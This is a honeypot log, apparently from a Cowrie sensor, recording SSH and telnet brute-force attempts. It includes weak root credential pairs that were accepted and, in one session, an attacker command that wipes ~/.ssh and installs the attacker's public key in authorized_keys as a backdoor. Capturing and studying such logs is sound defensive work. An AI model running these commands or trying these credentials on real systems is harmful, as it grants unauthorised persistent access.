{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.796254Z","src_ip":"212.227.235.229","session":"0e465a0da7c3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:12.873343Z","src_ip":"212.227.235.229","session":"0e465a0da7c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57130,"dst_ip":"1.2.3.4","dst_port":22,"session":"57dce024b4e7","protocol":"ssh","message":"New connection: 212.227.235.229:57130 (1.2.3.4:22) [session: 57dce024b4e7]","sensor":"my-vps","timestamp":"2025-08-26T04:44:12.948644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:12.949517Z","src_ip":"212.227.235.229","session":"57dce024b4e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:13.024879Z","src_ip":"212.227.235.229","session":"57dce024b4e7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:44:13.368280Z","src_ip":"212.227.235.229","session":"57dce024b4e7"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:13.446160Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:13.447015Z","src_ip":"212.227.235.229","session":"57dce024b4e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57652,"dst_ip":"1.2.3.4","dst_port":22,"session":"64528b4fb538","protocol":"ssh","message":"New connection: 212.227.235.229:57652 (1.2.3.4:22) [session: 64528b4fb538]","sensor":"my-vps","timestamp":"2025-08-26T04:44:40.447972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:40.449244Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:40.717999Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.login.success","username":"root","password":"Changeme@123","message":"login attempt [root/Changeme@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:44:41.832573Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:44:42.427204Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:44:42.427938Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:44:42.428988Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:42.698838Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:44:43.254198Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:44:43.255100Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:44:43.525654Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:43.526593Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45330,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a1aafb4b8ad","protocol":"ssh","message":"New connection: 212.227.235.229:45330 (1.2.3.4:22) [session: 5a1aafb4b8ad]","sensor":"my-vps","timestamp":"2025-08-26T04:44:43.794760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:43.795432Z","src_ip":"212.227.235.229","session":"5a1aafb4b8ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:44.065310Z","src_ip":"212.227.235.229","session":"5a1aafb4b8ad"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:44:45.185301Z","src_ip":"212.227.235.229","session":"5a1aafb4b8ad"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:46.458093Z","src_ip":"212.227.235.229","session":"5a1aafb4b8ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45344,"dst_ip":"1.2.3.4","dst_port":22,"session":"be3aaaad7280","protocol":"ssh","message":"New connection: 212.227.235.229:45344 (1.2.3.4:22) [session: be3aaaad7280]","sensor":"my-vps","timestamp":"2025-08-26T04:44:46.725207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:46.726194Z","src_ip":"212.227.235.229","session":"be3aaaad7280"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:46.994827Z","src_ip":"212.227.235.229","session":"be3aaaad7280"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:44:48.108898Z","src_ip":"212.227.235.229","session":"be3aaaad7280"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:48.378838Z","src_ip":"212.227.235.229","session":"be3aaaad7280"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:48.379754Z","src_ip":"212.227.235.229","session":"64528b4fb538"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54138,"dst_ip":"1.2.3.4","dst_port":22,"session":"640b248c998b","protocol":"ssh","message":"New connection: 217.72.205.35:54138 (1.2.3.4:22) [session: 640b248c998b]","sensor":"my-vps","timestamp":"2025-08-26T04:44:56.477324Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:56.478563Z","src_ip":"217.72.205.35","session":"640b248c998b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33950,"dst_ip":"1.2.3.4","dst_port":22,"session":"395d253e2bf0","protocol":"ssh","message":"New connection: 212.227.235.229:33950 (1.2.3.4:22) [session: 395d253e2bf0]","sensor":"my-vps","timestamp":"2025-08-26T04:44:59.247454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:59.248343Z","src_ip":"212.227.235.229","session":"395d253e2bf0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:59.524665Z","src_ip":"212.227.235.229","session":"395d253e2bf0"}
{"eventid":"cowrie.login.failed","username":"kunal","password":"kunal123","message":"login attempt [kunal/kunal123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:45:00.674131Z","src_ip":"212.227.235.229","session":"395d253e2bf0"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:45:01.956135Z","src_ip":"212.227.235.229","session":"395d253e2bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60818,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e4d382d807b","protocol":"ssh","message":"New connection: 212.227.235.229:60818 (1.2.3.4:22) [session: 8e4d382d807b]","sensor":"my-vps","timestamp":"2025-08-26T04:45:08.418689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:45:08.419711Z","src_ip":"212.227.235.229","session":"8e4d382d807b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:45:08.494344Z","src_ip":"212.227.235.229","session":"8e4d382d807b"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:45:08.798279Z","src_ip":"212.227.235.229","session":"8e4d382d807b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:45:09.876443Z","src_ip":"212.227.235.229","session":"8e4d382d807b"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":60786,"dst_ip":"1.2.3.4","dst_port":23,"session":"733de7d39f0d","protocol":"telnet","message":"New connection: 176.65.149.186:60786 (1.2.3.4:23) [session: 733de7d39f0d]","sensor":"my-vps","timestamp":"2025-08-26T04:45:19.566688Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:45:19.604181Z","src_ip":"176.65.149.186","session":"733de7d39f0d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:45:19.658236Z","src_ip":"176.65.149.186","session":"733de7d39f0d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T04:45:19.659335Z","src_ip":"176.65.149.186","session":"733de7d39f0d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T04:45:19.660047Z","src_ip":"176.65.149.186","session":"733de7d39f0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54786,"dst_ip":"1.2.3.4","dst_port":22,"session":"4595b0068d54","protocol":"ssh","message":"New connection: 212.227.235.229:54786 (1.2.3.4:22) [session: 4595b0068d54]","sensor":"my-vps","timestamp":"2025-08-26T04:45:21.859712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:45:21.860779Z","src_ip":"212.227.235.229","session":"4595b0068d54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:45:25.406774Z","src_ip":"212.227.235.229","session":"4595b0068d54"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwe123","message":"login attempt [user/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:45:26.165129Z","src_ip":"212.227.235.229","session":"4595b0068d54"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:45:27.419963Z","src_ip":"212.227.235.229","session":"4595b0068d54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"9445b41e3c9f","protocol":"ssh","message":"New connection: 212.227.235.229:6101 (1.2.3.4:22) [session: 9445b41e3c9f]","sensor":"my-vps","timestamp":"2025-08-26T04:45:50.781011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T04:45:51.171855Z","src_ip":"212.227.235.229","session":"9445b41e3c9f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T04:45:51.557344Z","src_ip":"212.227.235.229","session":"9445b41e3c9f"}
